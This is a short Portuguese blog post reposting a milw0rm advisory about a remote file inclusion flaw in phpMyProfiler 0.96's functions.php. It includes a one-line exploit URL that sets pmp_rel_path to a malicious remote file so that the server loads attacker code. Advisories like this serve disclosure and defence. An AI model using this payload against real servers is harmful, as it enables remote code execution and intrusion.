terça-feira, outubro 03, 2006

phpMyProfiler 0.96 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $pmp_rel_path do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: phpMyProfiler 0.96 e inferiores
Download: sourceforge.net
Código vulnerável (functions.php):
indisponível
Desoberta por: mozi
Exploit:
http://host/functions.php?pmp_rel_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com

Um comentário:

Anônimo disse...

Eae cara, quero trocar uma idéia com você, a respeito do blog aqui, me passa seu email e/ou me adiciona no msn/email:

boot.unknown@hotmail.com


Storm